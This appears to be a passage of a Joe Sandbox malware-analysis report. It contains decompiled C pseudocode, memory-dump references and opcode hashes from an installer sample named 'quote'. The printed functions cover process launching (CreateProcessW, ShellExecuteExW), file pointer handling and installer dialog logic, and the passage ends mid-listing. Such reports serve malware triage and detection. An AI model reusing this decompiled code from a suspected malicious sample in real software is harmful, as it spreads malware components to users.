                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                      • Instruction ID: a8bf680dc00a45444681dc473137f9a6d1885d4682ebfcc4eb1f2e5ca771b872
                                                                                      • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                      • Instruction Fuzzy Hash: 66C04C71754600BADA108B509E46F0677546750701F189429B641A50E0C674E410D61C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040347D(long _a4) {
                                                                                      				long _t2;
                                                                                      
                                                                                      				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                      				return _t2;
                                                                                      			}




                                                                                      0x0040348b
                                                                                      0x00403491

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 0040348B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405A3D(struct _SHELLEXECUTEINFOW* _a4) {
                                                                                      				struct _SHELLEXECUTEINFOW* _t4;
                                                                                      				int _t5;
                                                                                      
                                                                                      				_t4 = _a4;
                                                                                      				_t4->lpIDList = _t4->lpIDList & 0x00000000;
                                                                                      				_t4->cbSize = 0x3c; // executed
                                                                                      				_t5 = ShellExecuteExW(_t4); // executed
                                                                                      				return _t5;
                                                                                      			}





                                                                                      0x00405a3d
                                                                                      0x00405a42
                                                                                      0x00405a46
                                                                                      0x00405a4c
                                                                                      0x00405a52

                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00405A4C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecuteShell
                                                                                      • String ID:
                                                                                      • API String ID: 587946157-0
                                                                                      • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                      • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                                                      • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                      • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040439C(int _a4) {
                                                                                      				long _t2;
                                                                                      
                                                                                      				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                                                      				return _t2;
                                                                                      			}




                                                                                      0x004043aa
                                                                                      0x004043b0

                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                      • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                      • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                      • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404389(int _a4) {
                                                                                      				int _t2;
                                                                                      
                                                                                      				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                                                      				return _t2;
                                                                                      			}




                                                                                      0x00404393
                                                                                      0x00404399

                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00404160), ref: 00404393
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                      • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                      • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                      • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E00401FA4(void* __ecx) {
                                                                                      				void* _t9;
                                                                                      				intOrPtr _t13;
                                                                                      				void* _t15;
                                                                                      				void* _t17;
                                                                                      				void* _t20;
                                                                                      				void* _t22;
                                                                                      
                                                                                      				_t17 = __ecx;
                                                                                      				_t19 = E00402D3E(_t15);
                                                                                      				E00405479(0xffffffeb, _t7); // executed
                                                                                      				_t9 = E004059FA(_t19); // executed
                                                                                      				_t20 = _t9;
                                                                                      				if(_t20 == _t15) {
                                                                                      					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                      				} else {
                                                                                      					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                                                      						_t13 = E004068B1(_t17, _t20);
                                                                                      						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                                                      							if(_t13 != _t15) {
                                                                                      								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                      							}
                                                                                      						} else {
                                                                                      							E00406358( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                                      						}
                                                                                      					}
                                                                                      					_push(_t20);
                                                                                      					CloseHandle();
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t22 - 4));
                                                                                      				return 0;
                                                                                      			}









                                                                                      0x00401fa4
                                                                                      0x00401faa
                                                                                      0x00401faf
                                                                                      0x00401fb5
                                                                                      0x00401fba
                                                                                      0x00401fbe
                                                                                      0x00402925
                                                                                      0x00401fc4
                                                                                      0x00401fc7
                                                                                      0x00401fca
                                                                                      0x00401fd2
                                                                                      0x00401fe1
                                                                                      0x00401fe3
                                                                                      0x00401fe3
                                                                                      0x00401fd4
                                                                                      0x00401fd8
                                                                                      0x00401fd8
                                                                                      0x00401fd2
                                                                                      0x00401fea
                                                                                      0x00401feb
                                                                                      0x00401feb
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                        • Part of subcall function 00405479: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,00000000,00425A20,75A323A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                        • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,00000000,00425A20,75A323A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                        • Part of subcall function 00405479: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,004033B0), ref: 004054D4
                                                                                        • Part of subcall function 00405479: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll), ref: 004054E6
                                                                                        • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                        • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                        • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                        • Part of subcall function 004059FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 00405A23
                                                                                        • Part of subcall function 004059FA: CloseHandle.KERNEL32(?), ref: 00405A30
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                        • Part of subcall function 004068B1: WaitForSingleObject.KERNEL32(?,00000064), ref: 004068C2
                                                                                        • Part of subcall function 004068B1: GetExitCodeProcess.KERNEL32(?,?), ref: 004068E4
                                                                                        • Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2972824698-0
                                                                                      • Opcode ID: fd63206e802c0d6b08ee2c0b785af67798c8d0cdcb2ad02036aa23bf05e0b122
                                                                                      • Instruction ID: 70f87f17d48a981753e2349e7fd5e29e0bd5cf5a9d75e43b79cc9d2baa006ef6
                                                                                      • Opcode Fuzzy Hash: fd63206e802c0d6b08ee2c0b785af67798c8d0cdcb2ad02036aa23bf05e0b122
                                                                                      • Instruction Fuzzy Hash: 05F09632905111EBCB10AFA589849DE72B4DF00314B25453BE552B31D0C7BC0D419A6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004014D7(intOrPtr __edx) {
                                                                                      				long _t3;
                                                                                      				void* _t7;
                                                                                      				intOrPtr _t10;
                                                                                      				void* _t13;
                                                                                      
                                                                                      				_t10 = __edx;
                                                                                      				_t3 = E00402D1C(_t7);
                                                                                      				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                                                      				if(_t3 <= 1) {
                                                                                      					_t3 = 1;
                                                                                      				}
                                                                                      				Sleep(_t3); // executed
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t13 - 4));
                                                                                      				return 0;
                                                                                      			}







                                                                                      0x004014d7
                                                                                      0x004014d8
                                                                                      0x004014e1
                                                                                      0x004014e4
                                                                                      0x004014e8
                                                                                      0x004014e8
                                                                                      0x004014ea
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 0ace7dd340f464e4f6e60a0587c83798a9fee84c0299dc6499fa771c266bdfa1
                                                                                      • Instruction ID: 48b894a6b6243f55f811ea40c192212472d129cd546c7318a3a4cbaf3ee199e0
                                                                                      • Opcode Fuzzy Hash: 0ace7dd340f464e4f6e60a0587c83798a9fee84c0299dc6499fa771c266bdfa1
                                                                                      • Instruction Fuzzy Hash: EFD05E73A201009BC700DFB8BE8545E73B8EA903293304837D442E20D1E6B898418628
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E00404858(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				long _v16;
                                                                                      				long _v20;
                                                                                      				long _v24;
                                                                                      				char _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				long _v36;
                                                                                      				char _v40;
                                                                                      				unsigned int _v44;
                                                                                      				signed int _v48;
                                                                                      				WCHAR* _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				intOrPtr _v64;
                                                                                      				intOrPtr _v68;
                                                                                      				WCHAR* _v72;
                                                                                      				void _v76;
                                                                                      				struct HWND__* _v80;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr _t82;
                                                                                      				long _t87;
                                                                                      				short* _t89;
                                                                                      				void* _t95;
                                                                                      				signed int _t96;
                                                                                      				int _t109;
                                                                                      				signed short _t114;
                                                                                      				signed int _t118;
                                                                                      				struct HWND__** _t122;
                                                                                      				intOrPtr* _t138;
                                                                                      				WCHAR* _t146;
                                                                                      				intOrPtr _t147;
                                                                                      				unsigned int _t150;
                                                                                      				signed int _t152;
                                                                                      				unsigned int _t156;
                                                                                      				signed int _t158;
                                                                                      				signed int* _t159;
                                                                                      				signed int* _t160;
                                                                                      				struct HWND__* _t166;
                                                                                      				struct HWND__* _t167;
                                                                                      				int _t169;
                                                                                      				unsigned int _t197;
                                                                                      
                                                                                      				_t156 = __edx;
                                                                                      				_t82 =  *0x42c240; // 0x6bbd9c
                                                                                      				_v32 = _t82;
                                                                                      				_t2 = _t82 + 0x3c; // 0x0
                                                                                      				_t3 = _t82 + 0x38; // 0x0
                                                                                      				_t146 = ( *_t2 << 0xb) + 0x436000;
                                                                                      				_v12 =  *_t3;
                                                                                      				if(_a8 == 0x40b) {
                                                                                      					E00405A5B(0x3fb, _t146);
                                                                                      					E004066C0(_t146);
                                                                                      				}
                                                                                      				_t167 = _a4;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					L8:
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L20:
                                                                                      						if(_a8 == 0x40f) {
                                                                                      							L22:
                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                      							_v12 = _v12 & 0x00000000;
                                                                                      							E00405A5B(0x3fb, _t146);
                                                                                      							if(E00405DEE(_t186, _t146) == 0) {
                                                                                      								_v8 = 1;
                                                                                      							}
                                                                                      							E00406411(0x42b238, _t146);
                                                                                      							_t87 = E00406806(1);
                                                                                      							_v16 = _t87;
                                                                                      							if(_t87 == 0) {
                                                                                      								L30:
                                                                                      								E00406411(0x42b238, _t146);
                                                                                      								_t89 = E00405D91(0x42b238);
                                                                                      								_t158 = 0;
                                                                                      								if(_t89 != 0) {
                                                                                      									 *_t89 = 0;
                                                                                      								}
                                                                                      								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                      									goto L35;
                                                                                      								} else {
                                                                                      									_t169 = 0x400;
                                                                                      									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                      									asm("cdq");
                                                                                      									_v48 = _t109;
                                                                                      									_v44 = _t156;
                                                                                      									_v12 = 1;
                                                                                      									goto L36;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t159 = 0;
                                                                                      								if(0 == 0x42b238) {
                                                                                      									goto L30;
                                                                                      								} else {
                                                                                      									goto L26;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									L26:
                                                                                      									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                                                      									if(_t114 != 0) {
                                                                                      										break;
                                                                                      									}
                                                                                      									if(_t159 != 0) {
                                                                                      										 *_t159 =  *_t159 & _t114;
                                                                                      									}
                                                                                      									_t160 = E00405D32(0x42b238);
                                                                                      									 *_t160 =  *_t160 & 0x00000000;
                                                                                      									_t159 = _t160;
                                                                                      									 *_t159 = 0x5c;
                                                                                      									if(_t159 != 0x42b238) {
                                                                                      										continue;
                                                                                      									} else {
                                                                                      										goto L30;
                                                                                      									}
                                                                                      								}
                                                                                      								_t150 = _v44;
                                                                                      								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                      								_v44 = _t150 >> 0xa;
                                                                                      								_v12 = 1;
                                                                                      								_t158 = 0;
                                                                                      								__eflags = 0;
                                                                                      								L35:
                                                                                      								_t169 = 0x400;
                                                                                      								L36:
                                                                                      								_t95 = E00404CF5(5);
                                                                                      								if(_v12 != _t158) {
                                                                                      									_t197 = _v44;
                                                                                      									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                      										_v8 = 2;
                                                                                      									}
                                                                                      								}
                                                                                      								_t147 =  *0x433edc; // 0x6c266a
                                                                                      								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                      									E00404CDD(0x3ff, 0xfffffffb, _t95);
                                                                                      									if(_v12 == _t158) {
                                                                                      										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                                                      									} else {
                                                                                      										E00404C14(_t169, 0xfffffffc, _v48, _v44);
                                                                                      									}
                                                                                      								}
                                                                                      								_t96 = _v8;
                                                                                      								 *0x434fc4 = _t96;
                                                                                      								if(_t96 == _t158) {
                                                                                      									_v8 = E0040140B(7);
                                                                                      								}
                                                                                      								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                      									_v8 = _t158;
                                                                                      								}
                                                                                      								E00404389(0 | _v8 == _t158);
                                                                                      								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                                                      									E004047B1();
                                                                                      								}
                                                                                      								 *0x42d258 = _t158;
                                                                                      								goto L53;
                                                                                      							}
                                                                                      						}
                                                                                      						_t186 = _a8 - 0x405;
                                                                                      						if(_a8 != 0x405) {
                                                                                      							goto L53;
                                                                                      						}
                                                                                      						goto L22;
                                                                                      					}
                                                                                      					_t118 = _a12 & 0x0000ffff;
                                                                                      					if(_t118 != 0x3fb) {
                                                                                      						L12:
                                                                                      						if(_t118 == 0x3e9) {
                                                                                      							_t152 = 7;
                                                                                      							memset( &_v76, 0, _t152 << 2);
                                                                                      							_v80 = _t167;
                                                                                      							_v72 = 0x42d268;
                                                                                      							_v60 = E00404BAE;
                                                                                      							_v56 = _t146;
                                                                                      							_v68 = E0040644E(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                                                      							_t122 =  &_v80;
                                                                                      							_v64 = 0x41;
                                                                                      							__imp__SHBrowseForFolderW(_t122);
                                                                                      							if(_t122 == 0) {
                                                                                      								_a8 = 0x40f;
                                                                                      							} else {
                                                                                      								__imp__CoTaskMemFree(_t122);
                                                                                      								E00405CE6(_t146);
                                                                                      								_t125 =  *((intOrPtr*)( *0x434f14 + 0x11c));
                                                                                      								if( *((intOrPtr*)( *0x434f14 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption") {
                                                                                      									E0040644E(_t146, 0x42d268, _t167, 0, _t125);
                                                                                      									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                                                      										lstrcatW(_t146, 0x432ea0);
                                                                                      									}
                                                                                      								}
                                                                                      								 *0x42d258 =  *0x42d258 + 1;
                                                                                      								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                      							}
                                                                                      						}
                                                                                      						goto L20;
                                                                                      					}
                                                                                      					if(_a12 >> 0x10 != 0x300) {
                                                                                      						goto L53;
                                                                                      					}
                                                                                      					_a8 = 0x40f;
                                                                                      					goto L12;
                                                                                      				} else {
                                                                                      					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                      					if(E00405D5D(_t146) != 0 && E00405D91(_t146) == 0) {
                                                                                      						E00405CE6(_t146);
                                                                                      					}
                                                                                      					 *0x433ed8 = _t167;
                                                                                      					SetWindowTextW(_t166, _t146);
                                                                                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                      					_push(1);
                                                                                      					E00404367(_t167);
                                                                                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                      					_push(0x14);
                                                                                      					E00404367(_t167);
                                                                                      					E0040439C(_t166);
                                                                                      					_t138 = E00406806(8);
                                                                                      					if(_t138 == 0) {
                                                                                      						L53:
                                                                                      						return E004043CE(_a8, _a12, _a16);
                                                                                      					} else {
                                                                                      						 *_t138(_t166, 1);
                                                                                      						goto L8;
                                                                                      					}
                                                                                      				}
                                                                                      			}














































                                                                                      0x00404858
                                                                                      0x0040485e
                                                                                      0x00404864
                                                                                      0x00404868
                                                                                      0x0040486b
                                                                                      0x00404871
                                                                                      0x0040487f
                                                                                      0x00404882
                                                                                      0x0040488a
                                                                                      0x00404890
                                                                                      0x00404890
                                                                                      0x0040489c
                                                                                      0x0040489f
                                                                                      0x0040490d
                                                                                      0x00404914
                                                                                      0x004049eb
                                                                                      0x004049f2
                                                                                      0x00404a01
                                                                                      0x00404a01
                                                                                      0x00404a05
                                                                                      0x00404a0f
                                                                                      0x00404a1c
                                                                                      0x00404a1e
                                                                                      0x00404a1e
                                                                                      0x00404a2c
                                                                                      0x00404a33
                                                                                      0x00404a3a
                                                                                      0x00404a3d
                                                                                      0x00404a79
                                                                                      0x00404a7b
                                                                                      0x00404a81
                                                                                      0x00404a86
                                                                                      0x00404a8a
                                                                                      0x00404a8c
